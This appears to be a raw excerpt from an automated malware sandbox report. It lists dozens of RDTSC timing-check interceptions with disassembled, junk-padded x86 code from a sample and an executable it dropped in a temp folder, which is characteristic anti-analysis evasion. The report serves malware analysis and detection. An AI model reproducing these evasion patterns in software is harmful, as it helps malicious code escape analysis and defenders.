          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528058F second address: 52805CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 mov ah, dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c call 00007F65B4EE8BD6h 0x00000011 mov edi, esi 0x00000013 pop eax 0x00000014 mov dl, 98h 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F65B4EE8BD4h 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52805CE second address: 52805D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52805D4 second address: 52805D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52805D8 second address: 5280606 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4BDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F65B529F4C3h 0x00000014 pop eax 0x00000015 push edx 0x00000016 pop eax 0x00000017 popad 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280606 second address: 5280625 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280625 second address: 5280629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280629 second address: 528062F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528062F second address: 5280635 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280635 second address: 5280639 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280639 second address: 5280683 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr fs:[00000000h], eax 0x0000000e pushad 0x0000000f mov di, ax 0x00000012 push eax 0x00000013 pushfd 0x00000014 jmp 00007F65B529F4BBh 0x00000019 add eax, 10AEE15Eh 0x0000001f jmp 00007F65B529F4C9h 0x00000024 popfd 0x00000025 pop eax 0x00000026 popad 0x00000027 mov dword ptr [ebp-18h], esp 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280683 second address: 5280687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280687 second address: 528068B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528068B second address: 5280691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280691 second address: 5280697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280697 second address: 528069B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528069B second address: 5280707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000018h] 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F65B529F4BFh 0x00000015 sbb ah, 0000001Eh 0x00000018 jmp 00007F65B529F4C9h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F65B529F4C0h 0x00000024 adc cx, 6218h 0x00000029 jmp 00007F65B529F4BBh 0x0000002e popfd 0x0000002f popad 0x00000030 mov ecx, dword ptr [eax+00000FDCh] 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 mov ax, 2BE1h 0x0000003d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280707 second address: 528074B instructions: 0x00000000 rdtsc 0x00000002 call 00007F65B4EE8BCEh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a call 00007F65B4EE8BCBh 0x0000000f movzx ecx, di 0x00000012 pop edx 0x00000013 popad 0x00000014 test ecx, ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F65B4EE8BCDh 0x0000001f jmp 00007F65B4EE8BCBh 0x00000024 popfd 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528074B second address: 5280750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280750 second address: 52807C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, B6h 0x00000005 pushfd 0x00000006 jmp 00007F65B4EE8BCEh 0x0000000b or al, 00000038h 0x0000000e jmp 00007F65B4EE8BCBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 jns 00007F65B4EE8BD9h 0x0000001d pushad 0x0000001e mov di, cx 0x00000021 mov edx, ecx 0x00000023 popad 0x00000024 add eax, ecx 0x00000026 jmp 00007F65B4EE8BCAh 0x0000002b mov ecx, dword ptr [ebp+08h] 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F65B4EE8BCEh 0x00000035 xor ecx, 1F65AAC8h 0x0000003b jmp 00007F65B4EE8BCBh 0x00000040 popfd 0x00000041 mov bh, ah 0x00000043 popad 0x00000044 test ecx, ecx 0x00000046 push eax 0x00000047 push edx 0x00000048 jmp 00007F65B4EE8BCEh 0x0000004d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52702FA second address: 52703AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov cx, BE55h 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c jmp 00007F65B529F4BEh 0x00000011 push ecx 0x00000012 pushfd 0x00000013 jmp 00007F65B529F4C1h 0x00000018 and al, FFFFFF96h 0x0000001b jmp 00007F65B529F4C1h 0x00000020 popfd 0x00000021 pop eax 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 jmp 00007F65B529F4C7h 0x0000002a sub esp, 2Ch 0x0000002d jmp 00007F65B529F4C6h 0x00000032 xchg eax, ebx 0x00000033 pushad 0x00000034 mov cl, 4Dh 0x00000036 mov edi, 4335C12Eh 0x0000003b popad 0x0000003c push eax 0x0000003d jmp 00007F65B529F4C4h 0x00000042 xchg eax, ebx 0x00000043 pushad 0x00000044 push eax 0x00000045 push edx 0x00000046 pushfd 0x00000047 jmp 00007F65B529F4BCh 0x0000004c add ah, FFFFFFA8h 0x0000004f jmp 00007F65B529F4BBh 0x00000054 popfd 0x00000055 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5270452 second address: 5270464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65B4EE8BCEh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5270464 second address: 52704D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d jmp 00007F65B529F4BFh 0x00000012 sub edi, edi 0x00000014 jmp 00007F65B529F4BFh 0x00000019 inc ebx 0x0000001a jmp 00007F65B529F4C6h 0x0000001f test al, al 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F65B529F4BEh 0x00000028 or eax, 5B07C278h 0x0000002e jmp 00007F65B529F4BBh 0x00000033 popfd 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52704D4 second address: 5270517 instructions: 0x00000000 rdtsc 0x00000002 call 00007F65B4EE8BD5h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b je 00007F65B4EE8DDCh 0x00000011 jmp 00007F65B4EE8BD7h 0x00000016 lea ecx, dword ptr [ebp-14h] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c mov cl, bl 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 527079C second address: 52707B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65B529F4C1h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52707B1 second address: 52707DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F65B4EE8BCEh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52707DE second address: 52707E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52707E2 second address: 52707E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52707E8 second address: 52707FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F65B529F4C2h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52707FE second address: 5270827 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 jmp 00007F65B4EE8BD7h 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 mov edi, ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 movzx eax, di 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5270827 second address: 527086F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushfd 0x00000008 jmp 00007F65B529F4C5h 0x0000000d jmp 00007F65B529F4BBh 0x00000012 popfd 0x00000013 jmp 00007F65B529F4C8h 0x00000018 popad 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b mov edx, ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52708AA second address: 52708D9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F65B4EE8BD2h 0x00000008 adc cx, 19C8h 0x0000000d jmp 00007F65B4EE8BCBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 test esi, esi 0x00000018 pushad 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52700F8 second address: 5270110 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 movsx edx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-04h], 55534552h 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 527012F second address: 5270DDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, esi 0x00000005 push ecx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a leave 0x0000000b jmp 00007F65B4EE8BD6h 0x00000010 ret 0x00000011 nop 0x00000012 and bl, 00000001h 0x00000015 movzx eax, bl 0x00000018 lea esp, dword ptr [ebp-0Ch] 0x0000001b pop esi 0x0000001c pop edi 0x0000001d pop ebx 0x0000001e pop ebp 0x0000001f ret 0x00000020 add esp, 04h 0x00000023 jmp dword ptr [0017A41Ch+ebx*4] 0x0000002a push edi 0x0000002b call 00007F65B4F0E5C7h 0x00000030 push ebp 0x00000031 push ebx 0x00000032 push edi 0x00000033 push esi 0x00000034 sub esp, 000001D0h 0x0000003a mov dword ptr [esp+000001B4h], 0017CB10h 0x00000045 mov dword ptr [esp+000001B0h], 000000D0h 0x00000050 mov dword ptr [esp], 00000000h 0x00000057 mov eax, dword ptr [001781DCh] 0x0000005c call eax 0x0000005e mov edi, edi 0x00000060 push eax 0x00000061 push edx 0x00000062 jmp 00007F65B4EE8BD7h 0x00000067 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5270DDF second address: 5270DE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5270DE5 second address: 5270DE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5270DE9 second address: 5270DED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5270DED second address: 5270E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 jmp 00007F65B4EE8BCCh 0x0000000e mov dword ptr [esp], ebp 0x00000011 pushad 0x00000012 jmp 00007F65B4EE8BCEh 0x00000017 jmp 00007F65B4EE8BD2h 0x0000001c popad 0x0000001d mov ebp, esp 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F65B4EE8BCCh 0x00000027 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528001B second address: 528003E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 6Fh 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a call 00007F65B529F4B9h 0x0000000f pushad 0x00000010 mov dh, ch 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ecx, 7C394AF3h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 528003E second address: 5280092 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 mov dl, ch 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 jmp 00007F65B4EE8BD6h 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F65B4EE8BD0h 0x0000001c adc ch, 00000058h 0x0000001f jmp 00007F65B4EE8BCBh 0x00000024 popfd 0x00000025 mov si, B70Fh 0x00000029 popad 0x0000002a popad 0x0000002b mov eax, dword ptr [eax] 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280092 second address: 5280097 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5280191 second address: 52801C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 test al, al 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F65B4EE8BD6h 0x00000010 sub ax, C088h 0x00000015 jmp 00007F65B4EE8BCBh 0x0000001a popfd 0x0000001b mov bl, ch 0x0000001d popad 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52801C6 second address: 52801EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, cl 0x00000005 mov ax, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F6626963C6Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F65B529F4C2h 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52801EB second address: 528022D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp+08h], 00002000h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F65B4EE8BD4h 0x00000017 add ecx, 0A0C8078h 0x0000001d jmp 00007F65B4EE8BCBh 0x00000022 popfd 0x00000023 push eax 0x00000024 push edx 0x00000025 mov edx, ecx 0x00000027 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290754 second address: 5290791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F65B529F4C7h 0x0000000a xor ecx, 163BAA6Eh 0x00000010 jmp 00007F65B529F4C9h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290791 second address: 52907D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007F65B4EE8BCEh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F65B4EE8BD7h 0x0000001a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52907D2 second address: 52907F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52907F6 second address: 5290809 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BCFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290809 second address: 529084B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F65B529F4BFh 0x00000008 pop esi 0x00000009 mov bh, A3h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 movsx edi, cx 0x00000013 jmp 00007F65B529F4BAh 0x00000018 popad 0x00000019 xchg eax, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F65B529F4C7h 0x00000021 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 529084B second address: 5290851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290851 second address: 5290868 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F65B529F4BAh 0x00000012 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290868 second address: 52908F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c mov ax, dx 0x0000000f popad 0x00000010 je 00007F66265A66FFh 0x00000016 jmp 00007F65B4EE8BCDh 0x0000001b cmp dword ptr [769B459Ch], 05h 0x00000022 pushad 0x00000023 mov eax, 18332FB3h 0x00000028 popad 0x00000029 je 00007F66265BE7BEh 0x0000002f pushad 0x00000030 call 00007F65B4EE8BCBh 0x00000035 movzx esi, bx 0x00000038 pop edi 0x00000039 mov esi, 668CEB91h 0x0000003e popad 0x0000003f xchg eax, esi 0x00000040 pushad 0x00000041 pushfd 0x00000042 jmp 00007F65B4EE8BCAh 0x00000047 and al, FFFFFFE8h 0x0000004a jmp 00007F65B4EE8BCBh 0x0000004f popfd 0x00000050 pushad 0x00000051 push esi 0x00000052 pop edx 0x00000053 call 00007F65B4EE8BD2h 0x00000058 pop ecx 0x00000059 popad 0x0000005a popad 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52908F6 second address: 52908FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52908FA second address: 5290900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290900 second address: 5290920 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 mov dl, 7Fh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F65B529F4C0h 0x00000015 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290920 second address: 529092F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B4EE8BCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 529092F second address: 5290935 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290935 second address: 5290939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290939 second address: 529093D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52909E6 second address: 5290A02 instructions: 0x00000000 rdtsc 0x00000002 movsx edx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F65B4EE8BD1h 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290AC2 second address: 5290AC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290AC8 second address: 5290ACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5290ACC second address: 5290AD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: CBE231 second address: CBE23F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: CBE23F second address: CBE25C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: CBE25C second address: CBE261 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E38BED second address: E38BF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E38BF1 second address: E38BF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E38BF5 second address: E38C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F65B529F4C3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E37C0E second address: E37C1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E37C1A second address: E37C7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F65B529F4BBh 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007F65B529F4D2h 0x00000011 jmp 00007F65B529F4C3h 0x00000016 popad 0x00000017 pushad 0x00000018 jmp 00007F65B529F4C8h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E37C7E second address: E37C82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeRDTSC instruction interceptor: First address: E37C82 second address: E37C86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
